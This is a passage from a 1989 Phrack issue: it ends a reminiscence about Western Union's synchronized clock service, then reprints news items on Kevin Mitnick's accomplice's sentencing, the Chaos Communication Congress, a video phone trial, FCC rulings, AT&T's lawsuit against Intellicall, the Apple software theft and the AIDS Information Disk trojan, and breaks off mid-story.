available fingers; current would flow to every telegraph office and synch all
|
|
the master clocks in every community. Western Union charged fifty cents per
|
|
month for the service, and tossed the clock in for free! Oh yes, there was an
|
|
installation charge of about two dollars when you first had service (i.e. a
|
|
clock) installed.
|
|
|
|
The clocks were installed and maintained by the "clockman," a technician from
|
|
Western Union who spent his day going around hanging new clocks, taking them
|
|
out of service, changing batteries every few years for each clock, etc.
|
|
|
|
What a panic it was for them when "war time" (what we now call Daylight Savings
|
|
Time) came around each year! Wally, the guy who serviced all the clocks in
|
|
downtown Chicago had to start on *Thursday* before the Sunday official
|
|
changeover just to finish them all by *Tuesday* following. He would literally
|
|
rush in an office, use his screwdriver to open the case, twirl the hour hand
|
|
around one hour forward in the spring, (or eleven hours *forward* in the fall
|
|
since the hands could not be moved backward beyond the twelve going
|
|
counterclockwise), slam the case back on, screw it in, and move down the hall
|
|
to the next clock and repeat the process. He could finish several dozen clocks
|
|
per day, and usually the office assigned him a helper twice a year for these
|
|
events.
|
|
|
|
He said they never bothered to line the minute hand up just right, because it
|
|
would have taken too long, and ".....anyway, as long as we got it within a
|
|
minute or so, it would synch itself the next time the master clock sent a
|
|
signal..." Working fast, it took a minute to a minute and a half to open the
|
|
case, twirl the minute hand, put the case back on, "stop and b.s. with the
|
|
receptionist for a couple seconds" and move along.
|
|
|
|
The master clock sent its signal over regular telco phone lines. Usually it
|
|
would terminate in the main office of whatever place it was, and the (sub)
|
|
master there would take over at that point.
|
|
|
|
Wally said it was very important to do a professional job of hanging the clock
|
|
to begin with. It had to be level, and the pendulum had to be just right,
|
|
otherwise the clock would gain or lose more time than could be accommodated in
|
|
the hourly synching process. He said it was a very rare clock that actually
|
|
was out by even a minute once an hour, let alone the two minutes of tolerance
|
|
built into the gear works.
|
|
|
|
"...Sometimes I would come to work on Monday morning, and find out
|
|
in the office that the clock line had gone open Friday evening. So
|
|
nobody all weekend got a signal. Usually I would go down a manhole
|
|
and find it open someplace where one of the Bell guys messed it up,
|
|
or took it off and never put it back on. To find out where it was
|
|
open, someone in the office would 'ring out' the line; I'd go around
|
|
downtown following the loop as we had it laid out, and keep listening
|
|
on my headset for it. When I found the break or the open, I would
|
|
tie it down again and the office would release the line; but then I
|
|
had to go to all the clocks *before* that point and restart them,
|
|
since the constant current from the office during the search had
|
|
usually caused them to stop."
|
|
|
|
But he said, time and again, the clocks were usually so well mounted and hung
|
|
that "...it was rare we would find one so far out of synch that we had to
|
|
adjust it manually. Usually the first signal to make it through once I
|
|
repaired the circuit would yank everyone in town to make up for whatever they
|
|
lost or gained over the weekend..."
|
|
|
|
In 1965, Western Union decided to discontinue the Time Service. In a nostalgic
|
|
letter to subscribers, they announced their decision to suspend operations at
|
|
the end of the current month, but said "for old time's sake" anyone who had a
|
|
clock was welcome to keep it and continue using it; there just would not be any
|
|
setting signals from the master clocks any longer.
|
|
|
|
Within a day or two of the official announcement, every Western Union clock in
|
|
the Chicago area headquarters building was gone. The executives snatched them
|
|
off the wall, and took them home for the day when they would have historical
|
|
value. All the clocks in the telegraph offices disappeared about the same
|
|
time, to be replaced with standard office-style electric wall clocks.
|
|
_______________________________________________________________________________
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #11 of 12
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN P h r a c k W o r l d N e w s PWN
|
|
PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN
|
|
PWN Issue XXX/Part 1 PWN
|
|
PWN PWN
|
|
PWN Created, Written, and Edited PWN
|
|
PWN by Knight Lightning PWN
|
|
PWN PWN
|
|
PWN Special Thanks to Dark OverLord PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
Happy Holidays and Welcome to Issue XXX of Phrack World News!
|
|
|
|
This issue of Phrack World News contains stories and articles detailing events
|
|
and other information concerning Acid Phreak, AT&T, Apple Computer Co.,
|
|
Bellcore, Bernie S., Klaus Brunnstein, Cap'n Crunch, Captain Crook, Chaos
|
|
Communications Congress, Cheshire Catalyst, Clifford Stoll, CompuServe, Leonard
|
|
Mitchell DiCicco, Emmanuel Goldstein, FCC, Katie Hafner, Harpers Magazine,
|
|
Intellical, Michael Synergy, Kevin David Mitnick, Phiber Optik, Phonavision,
|
|
Phrozen Ghost, Prime Suspect, Sir Francis Drake, Susan Thunder, Telenet, Terra,
|
|
Tuc, Tymnet, The Well, and...
|
|
|
|
Announcing the Fourth Annual...
|
|
|
|
SummerCon '90
|
|
June 22-24, 1990
|
|
Saint Louis, Missouri
|
|
|
|
This year's convention looks to be the more incredible than ever. Many of you
|
|
will be hearing from us directly over the next few months about what will be
|
|
taking place and where SummerCon '90 will be held specifically. The posted
|
|
date is of course a tentative one (as we are still six months away), but any
|
|
and all changes or new information will be in PWN and passed to our network
|
|
friends.
|
|
|
|
If you are thinking about attending SummerCon '90, please find a way to contact
|
|
us as soon as possible. If you are not on the Internet or one of the public
|
|
access Unix systems across the country, then post a message on bulletin boards
|
|
that asks who is in contact with us. Chances are that there will be someone on
|
|
there that can reach us.
|
|
|
|
Knight Lightning / Forest Ranger / Taran King
|
|
|
|
"A New Decade Is Upon Us... And The Future Never Looked Brighter!"
|
|
_______________________________________________________________________________
|
|
|
|
Mitnick's Partner Gets Community Service November 29, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Kathy McDonald (New York Times)
|
|
|
|
"Man Sentenced To Community Service For Helping Steal Computer Program"
|
|
|
|
LOS ANGELES -- A federal judge has sentenced a 24-year-old suburban Calabasas
|
|
man to community service at a homeless shelter for his role in helping computer
|
|
hacker Kevin Mitnick steal a computer security program.
|
|
|
|
In rejecting a sentencing report that suggested a prison term, U.S. District
|
|
Judge Mariana Pfaelzer noted that Leonard Mitchell DiCicco had voluntarily
|
|
notified authorities of the computer hacking.
|
|
|
|
"I think you can do some good" in the community by using his computer skills
|
|
productively, Pfaelzer told DiCicco.
|
|
|
|
She sentenced DiCicco to five years of probation, during which he must complete
|
|
750 hours of community service through the Foundation for People, a Los Angeles
|
|
group that matches probationers with community service projects.
|
|
|
|
DiCicco was assigned to develop a computer system for the Anaheim Interfaith
|
|
Shelter, said Frances Dohn, a foundation official.
|
|
|
|
DiCicco also was ordered to pay $12,000 in restitution to Digital Equipment
|
|
Corporation of Massachusetts, from which Mitnick stole a computer security
|
|
program.
|
|
|
|
Assistant U.S. Attorney James Asperger agreed with the community service
|
|
sentence, saying DiCicco's cooperation had been crucial in the case against
|
|
Mitnick.
|
|
|
|
DiCicco reported Mitnick to DEC officers. Mitnick later admitted he stole the
|
|
program and electronically brought it to California.
|
|
|
|
DiCicco pleaded guilty in July to one count of aiding and abetting the
|
|
interstate transportation of stolen property. He admitted that in 1987 he let
|
|
Mitnick, age 25, of suburban Panorama City, use his office computer at
|
|
Voluntary Plan Administrators in Calabasas to break into the DEC system.
|
|
|
|
Mitnick pleaded guilty and was sentenced in July to one year in prison and six
|
|
months in a community treatment program aimed at breaking his "addiction" to
|
|
computer hacking.
|
|
|
|
Under a plea bargain agreement with the government, DiCicco pleaded guilty in
|
|
July in exchange for a promise that he would not be prosecuted for any of the
|
|
other instances of computer hacking he and Mitnick carried out.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
If you are looking for other articles related to Leonard Mitchell DiCicco and
|
|
the famous Kevin David Mitnick please refer to;
|
|
|
|
"Pacific Bell Means Business" (10/06/88) PWN XXI....Part 1
|
|
"Dangerous Hacker Is Captured" (No Date ) PWN XXII...Part 1
|
|
"Ex-Computer Whiz Kid Held On New Fraud Counts" (12/16/88) PWN XXII...Part 1
|
|
"Dangerous Keyboard Artist" (12/20/88) PWN XXII...Part 1
|
|
"Armed With A Keyboard And Considered Dangerous" (12/28/88) PWN XXIII..Part 1
|
|
"Dark Side Hacker Seen As Electronic Terrorist" (01/08/89) PWN XXIII..Part 1
|
|
"Mitnick Plea Bargains" (03/16/89) PWN XXV....Part 1
|
|
"Mitnick Plea Bargain Rejected As Too Lenient" (04/25/89) PWN XXVII..Part 1
|
|
"Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII..Part 1
|
|
"Mitnick Update" (05/10/89) PWN XXVII..Part 1
|
|
"Kenneth Siani Speaks Out About Kevin Mitnick" (05/23/89) PWN XXVII..Part 1
|
|
"Judge Suggests Computer Hacker Undergo Counseling"(07/17/89) PWN XXVIII.Part 1
|
|
"Authorities Backed Away From Original Allegations"(07/23/89) PWN XXVIII.Part 1
|
|
"Judge Proposes Comm. Service For Hacker's Accomp."(10/13/89) PWN XXX....Part 1
|
|
_______________________________________________________________________________
|
|
|
|
Chaos Communications Congress
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by Terra of the Chaos Computer Club
|
|
|
|
On December 27-29, 1989 is the Chaos Communication Congress at Eidelstaedter
|
|
Buergerhaus, Hamburg, West Germany.
|
|
|
|
The topics of this Congress include:
|
|
|
|
- The new German PTT law
|
|
|
|
- Discussion about Copyright and Freedom of Information act
|
|
|
|
- Women and Computers
|
|
|
|
- Mailbox and other Networks (Zerberus, InterEuNet, UUCP)
|
|
|
|
- Workshops for East and West German people to build networks between the two
|
|
countries.
|
|
|
|
- Discussion between Professor Klaus Brunnstein and CCC members about the
|
|
problems of viruses and worms.
|
|
|
|
- Workshops about Unix and UUCP for beginners, advanced, and special people
|
|
|
|
- Presswork in a special room
|
|
|
|
- Workshop Cyberbrain or Cyberpunk
|
|
|
|
- Workshop and Discussion about Secure Networks (Special: TeleTrust, coding
|
|
mixed gateways)
|
|
|
|
The prices to enter the Congress are
|
|
|
|
33 DM for Normal people
|
|
23 DM for CCC-members
|
|
53 DM for Press
|
|
|
|
Regards,
|
|
|
|
Terra
|
|
_______________________________________________________________________________
|
|
|
|
Phonavision At The University of California October 15, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Taken From the New York Times
|
|
|
|
CALIFORNIA -- Students at two campuses of the University of California, at
|
|
Berkeley and Los Angeles, have become the test market for a new public
|
|
video-telephone booth called Phonavision.
|
|
|
|
Its developers claim that it is the world's first video telephone for the
|
|
general public.
|
|
|
|
Each of the campuses has one of the large, silver-color phone booths in its
|
|
student union. Phonavision opened on October 9, for a week of free
|
|
demonstrations. Starting October 16, video phone calls from one campus to the
|
|
other will cost $10 for three minutes.
|
|
|
|
"We view all this semester as a test," said Stephen Strickland, chief executive
|
|
officer of the Los Angeles-based company, Communications Technologies, that
|
|
developed the video phones. "We want to be sure that when we do go to market
|
|
with this service, it's as good as it can be."
|
|
|
|
"We feel we're probably six months to a year away from having a system that we
|
|
can go out and market," Strickland said. "I see them in airport lobbies, hotel
|
|
lobbies, shopping centers, indoor high-traffic locations." Video telephones
|
|
are already widely used in business, he added.
|
|
|
|
Phonavision callers speak to each other on standard telephone receivers.
|
|
|
|
A snapshot-size image of their own face is projected on one half of a small
|
|
screen, and the other half shows a picture of the person to whom they are
|
|
talking.
|
|
|
|
As a caller talks, the video screen shows small movements of the mouth or face.
|
|
But sudden movements mean a distorted picture.
|
|
|
|
With a tilt of a caller's head, for example, the image will move to the side in
|
|
separate parts, starting with the top of the head and moving down in a wavelike
|
|
motion.
|
|
|
|
Annalee Andres, a sophomore from Santa Ana, California, who has not yet
|
|
selected a major, was one of the first students to try out Berkeley's new video
|
|
phone. She and her friends crowded around the phone booth in the Martin Luther
|
|
King Jr. Student Center, taking turns talking to a student from UCLA.
|
|
|
|
"I think it has a long way to go yet, but it's really cool," she said. "I can
|
|
really see where it's leading."
|
|
|
|
Ms. Andres speculated on the effects that widespread use of video phones would
|
|
have. "What if they catch you and you're just out of the shower?" she asked.
|
|
"It'll change dating."
|
|
|
|
Daniel Ciruli, a junior from Tucson, Arizona, majoring in computer science, was
|
|
enthusiastic about his trial session, but he said the fee would keep him away
|
|
in the future.
|
|
|
|
"It's a new toy," he said. "But at $10 for three minutes, with only one other
|
|
Phonavision, it's not going to be something that students are beating down the
|
|
door to use."
|
|
|
|
The video phone booth offers other services: Recording and dealing in
|
|
videotapes and a place to send and receive fax messages. The booth accepts $1,
|
|
$5, $10 and $20 bills, as well as Mastercard and Visa.
|
|
|
|
Gary Li, a senior from Beijing, who is majoring in electrical engineering,
|
|
started setting up Berkeley's phone booth in April. Since then he has spent
|
|
about 20 hours a week repairing kinks in the system.
|
|
|
|
Berkeley and UCLA were chosen as tryout spots for the new service because most
|
|
students know somebody at the other campus, said Strickland, the company's
|
|
chief executive.
|
|
|
|
"That's a place where we can get novelty use," he said, adding that "Berkeley
|
|
and UCLA have a reputation for being front-runner schools -- places that are
|
|
innovative, that like new technology."
|
|
|
|
Strickland said his company has spent almost three years developing
|
|
Phonavision. He would not disclose total costs, but priced the video phone
|
|
booths at $50,000 each.
|
|
_______________________________________________________________________________
|
|
|
|
The Omnipresent Telephone October 10, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Taken from The New York Times
|
|
|
|
Whatever the psychological implications, new technology has clearly made the
|
|
phone more omnipresent. More calls are generated because of answering
|
|
machines, now owned by 28 percent of the nation's households, according to the
|
|
Electronic Industries Association. People who use them say they make and
|
|
receive more calls because of them.
|
|
|
|
"In olden days you would just miss the call," said Michael Beglin, a
|
|
businessman in Nashville.
|
|
|
|
Jill Goodman, an art dealer in New York, says she talks on the phone so often
|
|
that "I'm tortured about it, teased and insulted." She uses the phone to
|
|
socialize, shop and check in with people she wants to stay in touch with but
|
|
does not want to take the time to see.
|
|
|
|
"I have two lines in the country, two lines at home in the city and three lines
|
|
in my office, if that gives you any idea of how much phone I can generate," she
|
|
said.
|
|
|
|
A month ago, after resisting initially, she decided to have a car phone
|
|
installed. "I thought it might be nice to have a couple of hours without being
|
|
reachable," she said. "But I didn't like not being able to reach when I wanted
|
|
to."
|
|
|
|
Increasingly, too, people are using the phone to get services, information and
|
|
products.
|
|
|
|
The 900 numbers, which require callers to pay the cost, and the 800 numbers,
|
|
paid for by the calls' recipients, are growing quickly.
|
|
|
|
Sprint Gateways started a new 900 service in May that already has 250 lines.
|
|
Callers can get wrestling trivia, financial updates, real-estate information
|
|
and a host of other data. They can even play a version of "Family Feud," which
|
|
receives as many as 7,000 calls a day, said Adrian Toader, the director of
|
|
sales and marketing.
|
|
|
|
Telephone shopping through 800 numbers continues to grow, too. In 1986, L.L.
|
|
Bean, the Freeport, Maine, retailer, received 60 percent of its orders by
|
|
telephone and 40 percent by mail; by 1988, telephone orders had risen to 70
|
|
percent. Like an increasing number of retailers, L.L. Bean allows customers to
|
|
call in their orders 24 hours a day.
|
|
|
|
But callers to 800 numbers often want more than a new shirt or sweater.
|
|
|
|
Susan Dilworth, who takes telephone orders for L.L. Bean, said, "A lot of
|
|
people call and say: 'I'm coming to New England for the first time. How
|
|
should I dress?'" Other callers order merchandise but then begin talking about
|
|
their personal lives. "I think they're lonely," Mrs. Dilworth said.
|
|
|
|
Indeed, these anonymous but personal contacts are so popular that some people
|
|
are becoming hooked.
|
|
|
|
Marilyn Ng-A-Qui, the acting executive director of the New York City Self-Help
|
|
Clearinghouse, said one man called looking for help because he had run up a
|
|
$5,000 bill calling 900 numbers. "It is emerging as a problem all over the
|
|
country," she said.
|
|
|
|
Despite the deluge of telephone conversation, there are holdouts. Lois Korey,
|
|
a partner in a New York advertising agency, writes letters whenever she can,
|
|
often suggesting lunch meetings. "I really like to see who I'm talking to,"
|
|
she said.
|
|
|
|
But even her partner, Allen Kay, calls her from his office just four feet away.
|
|
The only time he could not telephone, Mrs. Korey said, was when he was in his
|
|
car. And now those days are over. "He got a car phone a month ago, and he
|
|
calls all the time," she said. "When I sit in the front seat of his car, I try
|
|
to step on it."
|
|
_______________________________________________________________________________
|
|
|
|
Higher Phone Rates For Modem Users November 26, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
(Material gathered from an Apple digest on Usenet)
|
|
|
|
A new regulation that the FCC is quietly working on will directly affect you as
|
|
the user of a computer and modem. The FCC proposes that users of modems should
|
|
pay extra charges for use of the public telephone network which carry their
|
|
data.
|
|
|
|
In addition, computer network services such as CompuServe, Tymnet, & Telenet
|
|
would also be charged as much as $6.00 per hour per user for use of the public
|
|
telephone network. These charges would very likely be passed on to the
|
|
subscribers.
|
|
|
|
The money is to be collected and given to the telephone company in an effort to
|
|
raise funds lost to deregulation.
|
|
|
|
Jim Eason of KGO newstalk radio (San Francisco, California) commented on the
|
|
proposal during his afternoon radio program during which, he said he learned of
|
|
the new legislation in an article in the New York Times. Jim took the time to
|
|
gather the addresses which are given below.
|
|
|
|
It is important that you act now. The bureaucrats already have it in there
|
|
mind that modem users should subsidize the phone company and are now listening
|
|
to public comment. Please stand up and make it clear that we will not stand
|
|
for any government restriction on the free exchange of information.
|
|
|
|
The people to write to about this situation are:
|
|
|
|
Chairman of the FCC
|
|
1919 M Street N.W.
|
|
Washington, D.C. 20554
|
|
|
|
Chairman, Senate Communication Subcommittee
|
|
SH-227 Hart Building
|
|
Washington, D.C. 20510
|
|
|
|
Chairman, House Telecommunication Subcommittee
|
|
B-331 Rayburn Building
|
|
Washington, D.C. 20515
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Here is a sample letter:
|
|
|
|
Dear Sir,
|
|
Please allow me to express my displeasure with the FCC proposal which
|
|
would authorize a surcharge for the use of modems on the telephone network.
|
|
This regulation is nothing less than an attempt to restrict the free exchange
|
|
of information among the growing number of computer users. Calls placed using
|
|
modems require no special telephone company equipment, and users of modems pay
|
|
the phone company for use of the network in the form of a monthly bill. In
|
|
short, a modem call is the same as a voice call and therefore should not be
|
|
subject to any additional regulation.
|
|
_______________________________________________________________________________
|
|
|
|
FCC Orders Refunds to Long-Distance Companies November 30, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Taken from Associated Press
|
|
|
|
WASHINGTON -- Local telephone companies may have to refund as much as $75
|
|
million to long-distance companies and large private-line business customers,
|
|
the Federal Communications Commission says.
|
|
|
|
Pacific Northwest Bell in Idaho is one of the 15 companies named. The local
|
|
phone companies accumulated overcharges between 1985 and 1988 under FCC
|
|
guidelines that allowed prices of these high capacity private-line services to
|
|
exceed the phone companies' costs of providing the services.
|
|
|
|
The FCC ordered a refund as it considered challenges to the special pricing
|
|
scheme, which the local phone companies provide for long-distance companies or
|
|
large business customers. The commission voted 4-0 that the scheme was legal
|
|
during the 1985-88 period, when the high prices were designed to keep too many
|
|
customers from switching from the regular public network to private lines, but
|
|
that market conditions no longer justify continuation of the special pricing.
|
|
The commission said it expects the local phone companies to refrain from
|
|
requesting such special prices in the future.
|
|
|
|
While examining the challenges to the special pricing scheme, the commission
|
|
said it found that local phone companies in some cases had charged more than
|
|
allowed under the commission's guidelines. Therefore, the companies must
|
|
refund those charges, which could amount to as much as $75 million, the
|
|
commission said. The FCC said the amount of the refunds will not be known
|
|
until the local phone companies file detailed reports with the commission. The
|
|
companies have 40 days to make their filings.
|
|
|
|
The companies found not to be in compliance with the commission's pricing
|
|
guidelines from October 1, 1985 to December 31, 1986 were:
|
|
|
|
- Diamond State
|
|
- South Central Bell in Alabama
|
|
- Southwestern Bell in Missouri and Oklahoma
|
|
- Northwestern Bell in Iowa, Minnesota, Nebraska, and North Dakota
|
|
- Pacific Northwest Bell in Idaho
|
|
|
|
Pacific Northwest Bell is now called U.S. West Communications and is the phone
|
|
company that serves most Seattle-area residents.
|
|
|
|
Companies found not complying from January 1, 1987 to December 31, 1988 were:
|
|
|
|
- Ohio Bell
|
|
- Wisconsin Bell
|
|
- Southern Bell in North Carolina and South Carolina
|
|
- South Central Bell in Mississippi and Tennessee
|
|
- Pacific Bell
|
|
- Nevada Bell
|
|
- Southwestern Bell
|
|
- Mountain Bell
|
|
- Northwestern Bell
|
|
- Cincinnati Bell
|
|
_______________________________________________________________________________
|
|
|
|
AT&T v. Intellicall: Another Lawsuit November 8, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Dallas -- AT&T filed a lawsuit charging that a Texas-based corporation equips
|
|
its pay telephones to illegally obtain billing information owned by AT&T.
|
|
|
|
The lawsuit asks for $2 million in punitive damages and an undetermined amount
|
|
in actual damages from Intellicall Inc., headquartered in Carrollton, Texas.
|
|
It also asks the U.S. District Court in Dallas to order Intellicall to stop its
|
|
unauthorized use of AT&T billing information.
|
|
|
|
At issue is how Intellicall pay phones determine the validity of calling card
|
|
numbers for billing purposes. AT&T contends that Intellicall pay phones are
|
|
designed and programmed by Intellicall to reach into and obtain the information
|
|
directly from AT&T's card validation system.
|
|
|
|
That system, called Billing Validation Application (BVA), is a part of AT&T's
|
|
network facilities. Before AT&T completes a call that will be charged to an
|
|
AT&T Card, its validation system verifies that the number provided by the
|
|
customer is currently valid.
|
|
|
|
Based on contractual arrangements made before the 1984 breakup of the Bell
|
|
System, regional Bell telephone companies also use the validation system. AT&T
|
|
does not permit competitors such as Intellicall to use the system because the
|
|
system was built by AT&T and contains valuable competitive information.
|
|
|
|
AT&T alleges that when callers use an AT&T Card or Bell company calling card at
|
|
an Intellicall pay phone, the pay phone automatically places a separate call
|
|
through AT&T or local Bell facilities to a pre-programmed telephone number so
|
|
that AT&T's validation system will automatically check the card number.
|
|
|
|
If the card number is valid, the Intellicall pay phone then puts through the
|
|
original customer call.
|
|
|
|
"As a result of these practices," the lawsuit says, "Intellicall
|
|
surreptitiously and without authorization obtains validation data from AT&T,
|
|
obtains fraud control for calls by its customers without having to invest in
|
|
fraud control facilities or otherwise purchase fraud control services, imposes
|
|
costs on AT&T, and... obtains an unfair advantage over its competitors
|
|
providing pay telephone and/or long-distance service, including AT&T."
|
|
|
|
Although AT&T does not authorize other companies to accept the AT&T Card and
|
|
does not permit competitors to use its validation system, the lawsuit notes
|
|
that Intellicall could purchase validation services for Bell company calling
|
|
cards from other companies.
|
|
|
|
AT&T said it notified Intellicall that it was violating AT&T's proprietary
|
|
rights and gave Intellicall every reasonable opportunity to halt the fraudulent
|
|
validation practice. Only after Intellicall persisted in its unfair practices
|
|
did AT&T decide to take legal action.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
AT&T v. Intellicall: The Lawsuit Is Over November 13, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Dallas -- AT&T and Intellicall, Inc. today announced the settlement of a
|
|
lawsuit filed by AT&T against Intellicall, seeking damages and an injunction.
|
|
AT&T had accused Intellicall of unauthorized access to AT&T's calling card
|
|
validation system.
|
|
|
|
The settlement also covered potential counterclaims which Intellicall intended
|
|
to file against AT&T.
|
|
|
|
In the agreement, Intellicall acknowledged AT&T's proprietary rights in the
|
|
Billing Validation Application system, and agreed to make modifications in its
|
|
licensed pay telephone software to safeguard against unauthorized access and
|
|
use of the AT&T system.
|
|
|
|
The terms of the agreement include an undisclosed payment by Intellicall to
|
|
AT&T to contribute to the establishment of a compliance program which will
|
|
permit AT&T to monitor unauthorized access to its billing systems.
|
|
|
|
"AT&T is pleased that a settlement recognizing AT&T's proprietary right to the
|
|
validation system was reached so quickly," said Gerald Hines, director of AT&T
|
|
Card Services.
|
|
_______________________________________________________________________________
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #12 of 12
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN P h r a c k W o r l d N e w s PWN
|
|
PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN
|
|
PWN Issue XXX/Part 2 PWN
|
|
PWN PWN
|
|
PWN Created, Written, and Edited PWN
|
|
PWN by Knight Lightning PWN
|
|
PWN PWN
|
|
PWN Special Thanks to Dark OverLord PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
U.S. Inquiry Into Theft From Apple November 19, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by John Markoff (New York Times)
|
|
|
|
A former Apple Computer Inc. engineer has said he was served with a grand jury
|
|
subpeona and told by an FBI agent that he is a suspect in a theft of software
|
|
used by the company to design its Macintosh computer.
|
|
|
|
In June a group identifying itself as the Nu Prometheus League mailed copies of
|
|
computer disks containing the software to several trade magazines and software
|
|
developers.
|
|
|
|
Grady Ward, age 38, who worked for Apple until January (1989), said that he
|
|
received the subpeona from an FBI agent, who identified himself as Steven E.
|
|
Cook.
|
|
|
|
Ward said the agent told him that he was one of five suspects drawn from a
|
|
computerized list of people who had access to the material. The agent said the
|
|
five were considered the most likely to have taken the software.
|
|
|
|
A spokesman for the FBI in San Francisco said the agency would not comment on a
|
|
continuing investigation.
|
|
|
|
Ward said he had told the FBI he was innocent but would cooperate with the
|
|
investigation.
|
|
|
|
The theft of Apple's software has drawn a great deal of attention in Silicon
|
|
Valley, where technology and trade-secret cases have highlighted the crucial
|
|
role of skilled technical workers and the degree to which corporations depend
|
|
on their talents.
|
|
|
|
The case is unusual because the theft was apparently undertaken for
|
|
philosophical reasons and not for personal profit.
|
|
|
|
There is no indication of how many copies of the program were sent by Nu
|
|
Prometheus.
|
|
|
|
Software experts have said the programs would be useful to a company trying to
|
|
copy the distinctive appearance of the Macintosh display, but it would not
|
|
solve legal problems inherent in attempting to sell such a computer. Apple has
|
|
successfully prevented many imitators from selling copies of its Apple II and
|
|
Macintosh computers.
|
|
|
|
The disks were accompanied by a letter that said in part: "Our objective at
|
|
Apple is to distribute everything that prevents other manufacturers from
|
|
creating legal copies of the Macintosh. As an organization, the Nu Prometheus
|
|
League has no ambition beyond seeing the genius of a few Apple employees
|
|
benefit the entire world."
|
|
|
|
The group said it had taken its name from the Greek god who stole fire from the
|
|
gods and gave it to man.
|
|
|
|
The letter said the action was partially in response to Apple's pending suit
|
|
against Microsoft Corp. and Hewlett-Packard Co., accusing them of copying the
|
|
"look and feel" -- the screen appearance -- of the Macintosh.
|
|
|
|
Many technology experts in Silicon Valley believe Apple does not have special
|
|
rights to its Macintosh technology because most of the features of the computer
|
|
are copied from research originally done at Xerox Corp.'s Palo Alto Research
|
|
Center during the 1970s. The Macintosh was not introduced until 1984.
|
|
|
|
The theft came to light in June after Macweek, a trade magazine, published the
|
|
letter from Nu Prometheus.
|
|
|
|
At the time the theft was reported, executives at Apple, based in Cupertino,
|
|
California, said they took the incident seriously.
|
|
|
|
A spokeswoman said that Apple would not comment on details of the
|
|
investigation.
|
|
|
|
Ward said he had been told by the FBI agent that the agency believed Toshiba
|
|
Corp. had obtained a copy of the software and that copies of the program had
|
|
reached the Soviet Union.
|
|
|
|
The software is not restricted from export to the Communist bloc. Its main
|
|
value is commercial as an aid in copying Apple's technology.
|
|
|
|
Ward said the FBI agent would not tell him how it believed Toshiba had obtained
|
|
a copy of the software.
|
|
|
|
Ward also said the FBI agent told him that a computer programmer had taken a
|
|
copy of the software to the Soviet Union.
|
|
|
|
Ward said the FBI agent told him he was considered a suspect because he was a
|
|
"computer hacker," had gone to a liberal college and had studied briefly at the
|
|
Massachusetts Institute of Technology's Artificial Intelligence Laboratory.
|
|
|
|
The term "hacker" was first used at MIT to describe young programmers and
|
|
hardware designers who mastered the first interactive computers in the 1960s.
|
|
|
|
Ward is the second person to be interviewed by the FBI in the investigation of
|
|
the theft.
|
|
|
|
Earlier Charles Farnham, a businessman in San Jose, California, said two FBI
|
|
agents came to his office, but identified themselves as reporters for United
|
|
Press International.
|
|
|
|
Farnham, a Macintosh enthusiast, has disclosed information about unannounced
|
|
Apple products, said that after asking him to come outside his office, the men
|
|
said they were FBI agents and proceeded to question him about Nu Prometheus
|
|
group. He said he was not told that he was a suspect in the case.
|
|
|
|
UPI has complained to the FBI because of the incident.
|
|
|
|
Ward said he had joined Apple in 1979 and left last January to start his own
|
|
company, Illumind. He sells computerized dictionaries used as spelling
|
|
checkers and pronunciation guides.
|
|
|
|
He said the FBI told him that one person who had been mailed a copy of the
|
|
Apple software was Mitchell Kapor, founder of Lotus Development Corporation.
|
|
|
|
Kapor returned his copy of the disk unopened, Ward said the agent told him.
|
|
|
|
Ward said the FBI had also said he was suspect because he had founded a group
|
|
for the gifted known as Cincinnatus, which the agent said had roots in Greek
|
|
mythology that were similar to the Nu Prometheus group.
|
|
|
|
Ward said the FBI was mistaken, and Cincinnatus is a reference from ancient
|
|
Roman history, not Greek mythology.
|
|
_______________________________________________________________________________
|
|
|
|
Data-Destroying Disc Sent To European Computer Users December 13, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by John Markoff (New York Times)
|
|
|
|
A computer disk containing a destructive program known as a Trojan horse has
|
|
been mailed to computer users in at least four European countries.
|
|
|
|
It was not clear if any copies of the program had been mailed to people in the
|
|
United States.
|
|
|
|
The program, which threatens to destroy data unless a user pays a license fee
|
|
to a fictitious company in Panama City, Panama, may be a widespread attempt to
|
|
vandalize thousands of personal computers, several computer experts who have
|
|
studied the program said Tuesday, December 12.
|
|
|
|
Some computer experts said the disk was mailed by a "PC Cyborg" company to
|
|
subscribers of personal computer trade magazines, apparently using mailing
|
|
lists.
|
|
|
|
The disk is professionally packaged and accompanied by a brochure that
|
|
describes it as an "Aids Information Disk," the computer experts said. But
|
|
when it is installed in the user's computer it changes several files and hides
|
|
